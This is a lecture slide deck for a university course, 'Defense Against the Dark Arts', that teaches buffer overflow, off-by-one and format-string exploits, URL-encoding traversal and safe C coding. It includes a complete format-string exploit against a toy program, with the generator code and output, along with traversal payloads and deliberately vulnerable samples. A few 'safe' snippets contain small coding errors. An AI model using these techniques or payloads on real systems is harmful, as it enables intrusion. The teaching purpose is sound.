-
Notifications
You must be signed in to change notification settings - Fork 2
/
15-exploits.html
985 lines (782 loc) · 39.2 KB
/
15-exploits.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<title>DADA: Exploits</title>
<link rel="stylesheet" href="reveal.js/css/reveal.css">
<link rel="stylesheet" href="reveal.js/css/theme/black.css">
<link rel="stylesheet" href="dada.css">
<!-- Theme used for syntax highlighting of code -->
<link rel="stylesheet" href="reveal.js/lib/css/zenburn.css">
<!-- Printing and PDF exports -->
<script>
var link = document.createElement( 'link' );
link.rel = 'stylesheet';
link.type = 'text/css';
link.href = window.location.search.match( /print-pdf/gi ) ? 'css/print/pdf.css' : 'css/print/paper.css';
document.getElementsByTagName( 'head' )[0].appendChild( link );
</script>
</head>
<body>
<div class="reveal">
<div class="slides">
<section data-markdown id="cover"><script type="text/template">
# CS 4630
### Defense Against the Dark Arts
<center><small>[Aaron Bloomfield](http://www.cs.virginia.edu/~asb) / [[email protected]](mailto:[email protected]) / [@bloomfieldaaron](http://twitter.com/bloomfieldaaron)</small></center>
<center><small>Repository: [github.com/aaronbloomfield/dada](http://github.com/aaronbloomfield/dada) / [↑](index.html) / <a href="?print-pdf"><img class="print" width="20" src="images/print-icon.png"></a></small></center>
## Exploits
</script></section>
<section data-markdown><textarea data-template>
# Contents
[1st Generation Exploits](#/firstgen)
[2nd Generation Exploits](#/secondgen)
[3rd Generation Exploits](#/thirdgen)
[Miscellaneous Vulnterabilities](#/miscvul)
[Safe and Unsafe Coding](#/safeandunsafe)
[Defenses](#/defenses)
</textarea></section>
<section>
<section data-markdown id="firstgen"><textarea data-template>
# 1st Generation Exploits
</textarea></section>
<section data-markdown data-separator="^\n$"><textarea data-template>
## Vulnerabilities and Exploits
- *Vulnerability* is often used to refer only to vulnerable code in an OS or applications
- More generally, a vulnerability is whatever weakness in an overall system makes it open to attack
- An attack that was designed to target a known vulnerability is an *exploit* of that vulnerability
## Varieties of Vulnerabilities
- Buffer overflow on stack
- Primarily used to overwrite the return address
- Buffer overflow on heap
- Return addresses are not on the heap
- Other pointers are on the heap and can be overwritten, e.g. function & file pointers
- Format string attacks
- Memory management attacks
- Failure to validate input
- URL encoding failures; ... the list goes on
## Classifying Vulnerabilities
- Szor classifies vulnerabilities and exploits by generation
- First generation: Stack buffer overflow
- Second generation:
- Off by one overflows, heap overflows, file pointer overwriting, function pointer overwriting
- Third generation
- Format string attacks, memory (heap) management attacks
- ... the list is lengthy
## First Generation Exploits
- *Buffer overflow* is the most common exploit
- Array bounds not usually checked at run time
- What comes *after* the buffer being overflowed determines what can be attacked
- The return address is on the stack at a known offset after the last local variable
- Return address can be changed to cause a return to malicious code
- Buffer overflows are easy to guard against, yet they remain the most common code vulnerability
## Stack Buffer Overflow Example
```
void bogus(void) {
int i;
char buffer[256]; // Return address follows!
printf("Enter your data as a string.\n");
scanf("%s", buffer); // No bounds check!
process_data(buffer);
return;
// Returns to the return address that follows
// buffer[] on the stack frame
}
```
## Stack Buffer Overflow cont'd
<!-- .slide: class="right-float-img-1000" -->
![stack diagram](images/exploits/stack-buffer-overflow-1.png)
In the stack frame for `bogus()`, the return address is right above the saved frame pointer, which is right above `buffer[260]`
In the 64-bit calling convention, there (usually) is no saved frame pointer
## Stack Buffer Overflow cont'd.
- Notice that the program does not check to make sure that the user inputs 255 characters or less
- Source code is available for many operating systems and applications (or, they can be reverse engineered)
- Attacker can see that it is possible to overflow the buffer
- Buffer is last data item on the stack frame; the return address from this function will be at a defined distance after it
## Stack Buffer Overflow cont'd.
- Attacker can enter a character string representation of his malicious object code, long enough to fill the buffer
- At the end of the malicious code, the attacker passes the address of variable "buffer" so that it overwrites the return address of function `bogus()` on the stack frame
- When `bogus()` returns, it will cause a return to the buffer address, executing the malicious code in it
## Stack Buffer Overflow cont'd.
<!-- .slide: class="right-float-img-1000" -->
![stack diagram](images/exploits/stack-buffer-overflow-2.png)
`bogus()` is now "returning" to `buffer[0]`
</textarea></section>
</section>
<section>
<section data-markdown id="secondgen"><textarea data-template>
# 2nd Generation Exploits
</textarea></section>
<section data-markdown data-separator="^\n$"><textarea data-template>
## Heap Buffer Overflow
- Example: overwriting a file pointer
```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char **argv) {
int ch = 0, i = 0;
FILE *f = NULL;
static char buffer[16], *szFileName = "C:\\harmless.txt";
ch = getchar();
while (ch != EOF) /* User input can overflow buffer[] */
buffer[i++] = ch; ch = getchar();
f = fopen(szFileName, "w+b"); /* might be modified! */
fputs(buffer, f);
fclose(f);
return 0;
}
```
## Heap Buffer Overflow
- Examine the key lines of the example code:
```
static char buffer[16], *szFilename =
"C:\\harmless.txt";
```
- Both variables are placed in global heap (because they are static) and will be consecutive in the heap
- When `buffer[]` is overflowed with keyboard input, it will overwrite `szFilename`:
```
while (ch != EOF) { // User input can overflow buffer
buffer[i++] = ch;
ch = getchar();
}
```
## Heap Buffer Overflow
- An attacker who can compile the code and dump it to figure out addresses can now make `szFileName` point anywhere he wants
- For example, he could make it point to `argv[1]`; this means he can pass in a file name on the command line!
- So, the attacker passes in `C:\autoexec.bat` or some other protected system file name on the command line; if this program is a system utility that runs with admin privileges, the system file can be overwritten
## Off by One Attack
- The C language starts array indices at zero, which is not always intuitive for beginning programmers
- This often leads to off-by-one errors in code that fills a buffer
```
void vuln(char *foobar) {
int i;
char buffer[512];
for (i = 0; i <= 512; ++i) // Should be <, not <=
buffer[i] = foobar[i];
}
int main(int argc, char *argv[]) {
if (2 == argc)
vuln(argv[1]);
return 0;
}
```
## Off by One Attack
- How much damage could a one-byte exploit cause?
- The return address is NOT located just past the local variables on the x86 stack frame
- There is a saved EBP location between them (the frame pointer)
- The attacker cannot directly alter the return address
- S/he *can* alter the last byte of the saved EBP
## Off by One Attack
- When the vulnerable function returns, the calling function will now have a bogus stack frame
- This bogus stack frame can be arranged to lie within the buffer that was partly filled with malicious code
- When the caller of the vulnerable function returns, it will return into the start of the malicious code section of the buffer
## Off by One Stack Frame
- The caller of the vulnerable function ends up returning to a fake return address (inside buffer):
- 512 bytes of `buffer[]` received malicious code, plus a bogus stack frame, from the keyboard, as hex strings
- Byte 513 from the keyboard was the new lowest byte of the valid saved EBP
- Lowest because the x86 is little-Endian
- Thus making the caller's stack frame be inside `buffer[]`
## Off by One Stack Frame
<!-- .slide: class="max-image-height-500" -->
![off by one attack](images/exploits/off-by-one.png)
## Off by One: Real Examples
- [Nestea IP frame off-by-one denial of service attack](http://www.insecure.org/sploits/linux.PalmOS.nestea.html)
- [Linux fileutils "ls" command off-by-one memory exhaustion attack (system crashes)](http://www.linuxsecurity.com/content/view/105485/105/) (registration required)
- [Middleman printer proxy server Linux attack](http://www.linuxdevcenter.com/pub/a/linux/2003/01/13/insecurities.html#mid)
## Function Pointer Overwriting
- A system utility could have a function pointer to a callback function, declared after a buffer (Szor, Listing 10.5)
- Overflowing the buffer overwrites the function pointer
- By determining the address of system() on this machine, an attacker can cause system() to be called instead of the callback function
- [Macromedia Flash example](http://www.securiteam.com/windowsntfocus/6W00J00EKQ.html)
</textarea></section>
</section>
<section>
<section data-markdown id="thirdgen"><textarea data-template>
# 3rd Generation Exploits
</textarea></section>
<section data-markdown data-separator="^\n$"><textarea data-template>
## Format String Attacks
- Many C library functions produce formatted output using format strings
- e.g. `printf()`, `fprintf()`, `wprintf()`, `sprintf()`, etc.)
- These functions permit strings that have no format control to be printed (unfortunately):
```
char buffer[13] = "Hello, world!";
printf(buffer); /* Bad programmer! */
printf("%s", buffer); /* Good programmer! */
```
## Format String Attacks
- Consdier:
```
char buffer[13] = "Hello, world!";
printf(buffer); /* Bad programmer! */
```
- The format string (1st parameter to `printf()`) is not a fixed string
- This non-standard approach creates the possibility that an attacker will pass a format string rather than a string to print, which can be used to write to memory
## Format String Attack Example
Source code: [vuln.c](code/exploits/vuln.c) ([html](code/exploits/vuln.c.html))
```
void vuln(char buffer[256]) {
printf(buffer);
/* Bad; good would be: printf("%s",buffer) */
}
int main(int argc, char *argv[]) {
char buffer[256] = ""; /* allocate buffer */
if (2 == argc) /* copy command line */
strncpy(buffer, argv[1], 255);
vuln(buffer);
return 0;
}
```
- The included [Makefile](code/exploits/Makefile) compiles this to `vuln-32bit.exe` and `vuln-64bit.exe`
- What if the user passes `%x` on the command line?
## Format String Attack Example
- For sanity sake, we will probably want to run it via:
```
setarch x86_64 -v -LR vuln-32bit.exe
setarch x86_64 -v -LR vuln-64bit.exe
```
- This isn't necessary, but it will make our lives easier
- Since the addresses will be the same each time we run it
- And when run on the Ubuntu 16.04 VirtualBox image, your execution will match the examples in this slide set
## Format String Attack Example
- If the user passes `%x` on the command line, then printf() will receive a pointer to a string with `"%x"` in it on the stack
- `printf()` will see the `%x` and assume there is another parameter above it on the stack
- Whatever is above it on the stack will be printed in hexadecimal
- Difference between correct and incorrect uses of `printf()` is seen in next diagram
## Example: Uses of printf()
- Immediately after the call to `printf()`, but before the prologue code in `printf()`:
![format string attack](images/exploits/format-string-attack-1.png)
- This is the 32-bit version
## Example: Uses of printf()
- For the 64-bit version:
- The return addresses are still on the stack
- 0x4005f3 from `printf()` to `vuln()`
- 0x40067c from `vuln()` to `main()`
- The parameters are in registers (rdi for the first, rsi for the second, etc.)
- Note that, in both cases, there may be other values between the stack values shown
## Format String Attack Example
- In the bad code, whatever is above `%x` on the stack will be printed in hexadecimal
- Attacker can use `%x%x%x`, etc., to display the stack contents and figure out return addresses
- An attacker who can use an interactive utility can determine the exact address where his malicious code will be placed, where the return address is, and therefore what value to use to overwrite the return address
## Positioning Within the Stack
- If an attacker wants to skip over 32 bytes in the stack, he can supply 8 `%x` fields in the format string on the command line:
```
vuln-32bit.exe %x%x%x%x%x%x%x%x%s
vuln-64bit.exe %x%x%x%x%x%x%x%x%s
```
- The format string causes 8 ints to be printed off the stack in hex, using the `%x` specifiers, then prints a string (using `%s`) starting at the next stack position
## Positioning Within the Stack
- Some better formatting tips:
- One can use `%.8x` to ensure all values are printed with 8 digits
- Or `%.16lx` for the 64-bit version
- And put commas between
- To print 6 hex values:
```
vuln-32bit.exe %.8x,%.8x,%.8x,%.8x,%.8x,%.8x
vuln-64bit.exe %.16lx,%.16lx,%.16lx,%.16lx,%.16lx,%.16lx
```
## Overwriting Within the Stack
- The format string can also be used to force `printf()` to write to memory via `%n`:
```
printf("foobar%n", &nBytesWritten);
```
- This prints "foobar", writes 6 to `nBytesWritten`
- We can also use `%hn` for a short, or `%ln` for a long
- Attacker can supply address to write to:
```
vuln-32bit.exe 0x12FE7C%x%x%n
```
- We'll see how this works next...
## A vulnerability
Consider the [exploitable.c](code/exploits/exploitable.c) ([html](code/exploits/exploitable.c.html)) code:
```
int exploited() {
printf("Got here!\n");
exit(0);
}
int main(void) {
char buffer[100];
while (fgets(buffer, sizeof buffer, stdin)) {
printf(buffer);
}
return 0;
}
```
- Can we supply a string such that `exploited()` will be called?
## Where are we going? And why are we in this handbasket?
- First, we need to get the address of `fgets()` and also `exploited()`
- We want to change a fall to `fgets()` to be a call to `exploited()`
- We can get that through `objdump`
## `objdump -d exploitable.exe`
<pre class="code">
exploitable.exe: file format elf64-x86-64
Disassembly of section .init:
...
0000000000400580 < fgets@plt >:
400580: ff 25 b2 0a 20 00 jmpq *0x200ab2(%rip) # <span class='red'>601038</span> <_GLOBAL_OFFSET_TABLE_+0x38>
400586: 68 04 00 00 00 pushq $0x4
40058b: e9 a0 ff ff ff jmpq 400530 <_init+0x20>
0000000000<span class='red'>4006a6</span> < exploited >:
4006a6: 55 push %rbp
...
</pre>
- The address of `exploited()` is 0x4006a6
- The address of the pointer to `fgets()` is 0x601038
- Scroll the code window to the right to see this
## A bit more background
- `exploited()` address 0x4006a6 is 4,196,006 in decimal
- Recall that parameter 1 will be in rdi, and it will be a pointer to the buffer
- 1 character specifiers, such as `%c`, still "read" in 8 bytes on the stack, but print out one character
## Faking printf() parameters
![format string attack](images/exploits/format-string-attack-2.png)
## Creating the exploit
- The goal:
- Have 5 specifiers to "burn" the values in the registers
- Generate the address for `exploited()` by printing 0x4006a6 = 4,196,006 bytes to stdout (!)
- Overwrite the `fgets()` address by writing that value to the address of 0x601038
- Our format string will contain:
- A whole bunch of specifiers
- The address, in hex, of `fgets()`: 0x601038
## Parts of the puzzle
- To "burn" the five registers registers, we'll print them as characters:
```
%c%c%c%c%c
```
- To print many characters, we'll use an unsigned int specifier with a large number of digits
```
%.4196006u
```
- (that number will change slightly)
- Once we've printed out 4 Mb of characters, we can write that number as a pointer to memory
## The result
<pre class="code">
<span class="springgreen">%c%c%c%c%c</span><span class="darkkhaki">%c%c%c</span><span class="coral">%.4195998u</span><span class="darkgray">%ln</span><span class="lightskyblue">???</span><span class="palevioletred">0x601038</span>
</pre>
- <span class="springgreen">%c%c%c%c%c</span> "burns" the registers
- <span class="darkkhaki">%c%c%c</span> moves forward 3 "spots" (24 bytes)
- <span class="coral">%.4195998u</span> writes most of the 4 Mb of characters
- <span class="darkgray">%ln</span> writes the value to memory
- <span class="lightskyblue">???</span> aligns the text so far to 32 bytes
- <span class="palevioletred">0x601038</span> is the address to write to
- It's provided as binary, not the text shown
## Analysis
<pre class="code">
<span class="springgreen">%c%c%c%c%c</span><span class="darkkhaki">%c%c%c</span><span class="coral">%.4195998u</span><span class="darkgray">%ln</span><span class="lightskyblue">???</span><span class="palevioletred">0x601038</span>
</pre>
- Total bytes written to stdout:
- 5 from <span class="springgreen">%c%c%c%c%c</span>
- 3 from <span class="darkkhaki">%c%c%c</span>
- 4,195,998 from <span class="coral">%.4195998u</span>
- Total is 4,196,006
- In hex, that's 0x4006a6
- This is the value written by <span class="darkgray">%ln</span> as a 8-byte value
- Since <span class="darkgray">%ln</span> writes as a `long`
## Analysis
<pre class="code">
<span class="springgreen">%c%c%c%c%c</span><span class="darkkhaki">%c%c%c</span><span class="coral">%.4195998u</span><span class="darkgray">%ln</span><span class="lightskyblue">???</span><span class="palevioletred">0x601038</span>
</pre>
- How does <span class="darkgray">%ln</span> get the address?
- `printf()` sees 4 "values" on the stack (after burning the registers):
- The 1st <span class="darkkhaki">%c</span> reads the first 8 bytes: <span class="springgreen">%c%c%c%c</span>
- The 2nd <span class="darkkhaki">%c</span> reads the next 8 bytes: <span class="springgreen">%c</span><span class="darkkhaki">%c%c%c</span>
- The 3rd <span class="darkkhaki">%c</span> reads the next 8 bytes: <span class="coral">%.419599</span>
- The <span class="coral">%.4195998u</span> reads the next 8 bytes: <span class="coral">8u</span><span class="darkgray">%ln</span><span class="lightskyblue">???</span> (and interprets it as an unsigned)
- Thus, when it's time to find the address for <span class="darkgray">%ln</span>, what is read is <span class="palevioletred">0x601038</span>
## The result
Consider the [attack.c](code/exploits/attack.c) ([html](code/exploits/attack.c.html)) code:
```
#include <stdio.h>
int main() {
/* advance through 5 registers, then 4 * 8 = 32 bytes
* down stack, outputting 4195998 + 8 characters
* before using %ln to store a long. Then pad that
* to 32 bytes of text. */
fputs("%c%c%c%c%c%c%c%c%.4195998u%ln???", stdout);
/* write pointer value, which will include \0s */
void *ptr = (void*) 0x601038;
fwrite(&ptr, 1, sizeof(ptr), stdout);
fputs("\n", stdout);
return 0;
}
```
- Note that we have to use `fwrite()`, since we are writing binary data
## Output analysis
<pre class="codesmall">
$ ./exploitable.exe < attack.out > exploitable.out
$ hexdump -C exploitable.out
00000000 39 90 0a 39 38 25 25 25 30 30 30 30 30 30 30 30 |9..98%%%00000000|
00000010 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000|
*
00400690 30 30 30 30 30 30 30 30 30 30 30 30 31 38 31 34 |0000000000001814|
004006a0 33 39 34 31 36 38 3f 3f 3f 38 10 60 47 6f 74 20 |394168???8.`Got |
004006b0 68 65 72 65 21 0a |here!.|
004006b6
$
</pre>
- The first 5 bytes are the parameter registers as chars
- The next three bytes is the format string as chars
- The next 4,195,998 bytes are the end of the format string interpreted as an unsigned
- The value is 1,814,394,168, with a *lot* of leading 0's
- Note that hexdump removes most of the 0's from this output display
## Output analysis
<pre class="codesmall">
$ ./exploitable.exe < attack.out > exploitable.out
$ hexdump -C exploitable.out
00000000 39 90 0a 39 38 25 25 25 30 30 30 30 30 30 30 30 |9..98%%%00000000|
00000010 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000|
*
00400690 30 30 30 30 30 30 30 30 30 30 30 30 31 38 31 34 |0000000000001814|
004006a0 33 39 34 31 36 38 3f 3f 3f 38 10 60 47 6f 74 20 |394168???8.`Got |
004006b0 68 65 72 65 21 0a |here!.|
004006b6
$
</pre>
- The next three ?'s are the padding from the source code
- The address, in binary, is printed next, as 3 characters (0x601038)
- The end of the input is the "Got here\n" from the `exploited()` function
## Writing an Arbitrary Value
- Some modern C libraries do not permit huge width specifiers, so 0x601038 cannot always be written using a single `%n` field
- An attacker can work around this defense by writing 0x601038 as three separate bytes: 0x60, 0x10, and 0x38, to three consecutive byte locations that overwrite the old return address, using three `%n` fields on the command line
- Only works on a machine such as the x86 that permits unaligned byte stores to memory
## Example
- We want to:
- Write 1000 (short) (equals 0x3e8) to address 0x1234567890ABCDEF
- Write 2000 (short) (equals 0x7d0) to address 0x1234567890ABCDF1
- We "know" that the buffer starts 16 bytes above `printf()` return address
- The result:
<pre class="code">
<span class="springgreen">%c%c%c%c%c</span><span class="darkkhaki">%c%c%c%c%.991u</span><span class="coral">%hn</span><span class="darkgray">%.1000u</span><span class="lightskyblue">%hn</span>
</pre>
## Example
<pre class="code">
<span class="springgreen">%c%c%c%c%c</span><span class="darkkhaki">%c%c%c%c%.991u</span><span class="coral">%hn</span><span class="darkgray">%.1000u</span><span class="lightskyblue">%hn</span>
</pre>
- <span class="springgreen">%c%c%c%c%c</span>: skip over registers
- <span class="darkkhaki">%c%c%c%c%.991u</span>: skip to format string buffer, past format part
- 9 + 991 chars is 1000
- <span class="coral">%hn</span>: write to first pointer
- <span class="darkgray">%.1000u</span>: 1000 + 1000 = 2000
- <span class="lightskyblue">%hn</span>: write to second pointer
- (note that we haven't showed the rest of the format string, which would contain the addresses for the two <span class="coral">%hn</span> specifiers)
## Heap Management
- A heap allocation (e.g. via `malloc()`) allocates a small control block, with pointer and size fields, just before the memory that is allocated
- An attacker can underflow the heap memory allocated (in the absence of proper bounds checking, or with pointer arithmetic) and overwrite the control block
- The heap management software will now use the overwritten memory pointer info in the control block, and can thus be redirected to write to arbitrary memory addresses
## Input Validation Failures
- There are numerous ways in which an application program can fail to validate user input
- We will examine the two failures that are most important in the Internet age:
- URL encoding and canonicalization
- MIME header parsing
## URL Encoding and Canonicalization
- The following URLs represent the same image file:
- http://domain.tld/user/foo.gif
- http://domain.tld/user/bar/../foo.gif
- Canonicalization converts URLs into a standard form
- The 2nd URL above would be converted to the 1st
- Szor, p. 385: "A URL canonicalization vulnerability occurs when a security decision is based on a URL and not all of the URL representations are taken into account."
## URL Encoding and Canonicalization
- Suppose a web server only allows external access to the /user subdirectories, but does not canonicalize URLs before checking them:
- http://domain.tld/user/index.html (legal)
- http://domain.tld/passwords.txt (illegal)
- http://domain.tld/user/../passwords.txt (canonicalization exploit)
- After many such exploits, server software began searching for ".." and converting URLs to canonical form
- However, character encoding permitted canonicalization exploits to continue
## URL Character Encoding
- Most web servers support UTF-8 charset encoding; e.g. `%2F` represents a forward slash
- Encoding rules:
- 0- 7 bits input xxxxxxx becomes 0xxxxxxx
- 8-11 bits input xxxxxxxxxxx becomes 110xxxxx 10xxxxxx
- 12-16 bits input xxxx...xxxx becomes 1110xxxx 10xxxxxx 10xxxxxx
- 17-21 bits input xxxx...xxxxx becomes 11110xxx 10xxxxxx (2x more)
## URL Character Encoding
- It is easy enough for the server to spot `%2F` and recognize a forward slash, but `%2F` can be encoded via the 8-11 bits format as `%C0%AF`:
- http://domain.tld/user/..%C0%AFpasswords.txt
- No longer looks like ../ is present, but it is!
## URL Character Encoding cont.
- Simple encoding problem was easily fixed in web servers, but multilevel encoding is possible:
- `%255c` is not recognized as a backslash by the security checker.
- After one round of decoding, %255c becomes %5c, because %25 is a code for the percent sign itself: %25 ? %
- The result, %5c, would be flagged as a backslash by the security checker if it had been present initially; it was only searching for '%5c' or '\'
## URL Character Encoding cont.
- One more round of decoding will be invoked by the server, because it sees the % sign, and `%5c` will become a backslash (useful in Windows path names);
- after the encoding exploit has passed the security checker, the web page server will serve the page (unfortunately!)
## URL Character Encoding cont.
- Web servers such as Microsoft IIS have been patched to fix this vulnerability
- Before the patch, the [W32/Nimda](https://www.symantec.com/security_response/writeup.jsp?docid=2001-091816-3508-99) worm used this trick to backtrack into the root directory and use cmd.exe to copy itself over the web to the server and execute itself.
## MIME Header Parsing
- An email can have embedded or attached MIME files
- Outlook and other email clients often use Internet Explorer to parse the MIME files
- A MIME file type can be associated with an application and passed automatically to it, e.g. audio/x-wav files can be associated in Windows with Windows Media Player, so such a file would be sent by Internet Explorer directly to its associated application
## MIME Header Parsing
- Vulnerability: Internet Explorer (before being fixed; see [here](http://www.microsoft.com/technet/security/bulletin/MS01-020.mspx)) would determine that the attachment should be opened automatically by an application, but would then allow the file extension to take priority in determining what application to use
## MIME Header Parsing
- Exploit: Make an attachment of MIME type audio/x-wav but make the file name be virus.exe.
- The MIME type causes Internet Explorer to make the decision to open it automatically (even though the Outlook email client might have settings that should prevent opening *.exe files).
- Then, the *.exe extension causes Internet Explorer to pass it to the OS to execute.
- Vulnerability fixed in 2001 (IE 5.x).
- Not before [W32/Badtrans](https://www.symantec.com/security_response/writeup.jsp?docid=2001-112410-5327-99) and [W32/Klez](https://www.symantec.com/security_response/writeup.jsp?docid=2002-041714-3225-99) could exploit it.
</textarea></section>
</section>
<section>
<section data-markdown id="miscvul"><textarea data-template>
# Miscellaneous Vulnerabilities
</textarea></section>
<section data-markdown data-separator="^\n$"><textarea data-template>
## Miscellaneous Vulnerabilities
- Mistakes by system administrators, users, bad default security levels in applications software or firewalls, etc., can all create vulnerabilities
- Most exploits (including all 3 generations) are referred to as *blended attacks*
- Because there is always a mixture of an exploit and a particular type of malicious code
- e.g. overflowing a buffer is an exploit, but depositing a virus and running it is the second stage of the blended attack
- We will review some non source code examples
## System Administration Vulnerabilities
- Failure to provide secure utilities
- e.g. SSL/SSH remote login utilities were not commonly used a decade ago
- Loose file system access rights and user privilege levels
- many users have no idea that everyone can read many of their files
- or the 4th octal digit of chmod permissions
## System Administration Vulnerabilities
- Errors in firewall configuration (Szor, sec. 14.3)
- Allows attackers unauthorized access
- Permits denial of service attacks to continue instead of excluding the flood of packets
## User Behavior Vulnerabilities
- Poor password selection
- Too short; all alphabetic; common words
- 1988 Morris worm used a list of only 432 common passwords, and succeeded in cracking many user accounts all over the internet
- This was the main reason the worm spread more than the creator thought it would; he did not realize that password selection was that bad!
- Opening executable email attachments
## Vulnerabilities: Do We Ever Learn?
- All of these vulnerabilities have been known for years -- buffer overflows for over 40 years!
- Yet, the number of exploits is increasing
- 323 buffer overflow vulnerabilities reported in 2004 to the national cyber-security vulnerability database (http://nvd.nist.gov/)
- 331 buffer overflow vulnerabilities reported in just the first 6 months of 2005!
- They don't bother to keep track anymore...
## Avoiding Vulnerabilities
- Good password selection
- Many newer systems even allow pass phrases, i.e. multiple words with punctuation or blanks between
- System should try its own dictionary attack and not permit you to choose a password that can be defeated
- Don't store a password unencrypted anywhere in a system, even in a temporary variable in a program
## Avoiding Vulnerabilities
- Don't open executable email attachments
- Review access permissions throughout your file directory structure
- Display and review your firewall settings
</textarea></section>
</section>
<section>
<section data-markdown id="safeandunsafe"><textarea data-template>
# Safe and Unsafe Coding
</textarea></section>
<section data-markdown data-separator="^\n$"><textarea data-template>
## Avoiding Vulnerabilities
- Good coding style
- Use only the good form of `printf()`; never use `printf(buffer)` for any function in the `printf()` family
- Review loop bounds for off-by-one errors
- Avoid unsafe C functions (e.g. `strcpy()`, `strcat()`, `sprintf()`, `gets()`, `scanf()`) and learn how to use alternatives (e.g. `strncpy()`, `strncat()`, `snprintf()`)
- Insert bounds checking code
## Avoiding Vulnerabilities
- Good coding style, continued
- Avoid unsafe programming languages (C, C++) and use more modern, safe languages wherever possible (Java, Ada, C# in managed mode)
- We will look at some coding style pointers from [Building Secure Software](https://www.amazon.com/Building-Secure-Software-Addison-Wesley-Professional/dp/0321774957) by Viega and McGraw
## Safe and Unsafe Coding
- Unsafe:
```
void main() {
char buf[1024];
gets(buf); /* Won't stop at 1024 bytes */
}
```
- Safe:
```
#define BUFSIZE 1024
void main() {
char buf[BUFSIZE];
fgets(buf, BUFSIZE, stdin);
}
```
## Safe and Unsafe Coding
- Unsafe:
```
strcpy(dst, src); /* What prevents buffer overflow? */
```
- Safe:
```
#define DSTSIZE 1024
char dst[DSTSIZE];
:
:
/* Leave room for null terminator: */
strncpy(dst, src, DSTSIZE - 1);
/* Null terminate the string: */
dst[DSTSIZE - 1] = `\0';
```
## Safe and Unsafe Coding
- Unsafe:
```
strcpy(dst, src); /* What prevents buffer overflow? */
```
- Safe:
```
/* Another way to fix the problem: */
dst = (char *) malloc(strlen(src) + 1);
if (NULL == dst) {
/* handle error here, abort */
}
strcpy(dst, src);
```
## Safe and Unsafe Coding
- Unsafe:
```
strcat(dst, src);
/* Enough room left in dst to concatenate src? */
```
- Safe:
```
strncat(dst, src, DSTSIZE - strlen(dst) - 1);
```
## Safe and Unsafe Coding
- Unsafe:
```
int main(int argc, char *argv[]) {
char usage[1024];
/* Big enough for a valid file name ... right? */
sprintf(usage, "USAGE: %s -f flag [arg1]\n", argv[0]);
return 0;
}
```
- Safe:
```
int main(int argc, char *argv[]) {
char usage[1024];
char format_string = "USAGE: %s -f flag [arg1]\n";
snprintf(usage, 1024, format_string, argv[0]);
return 0;
}
```
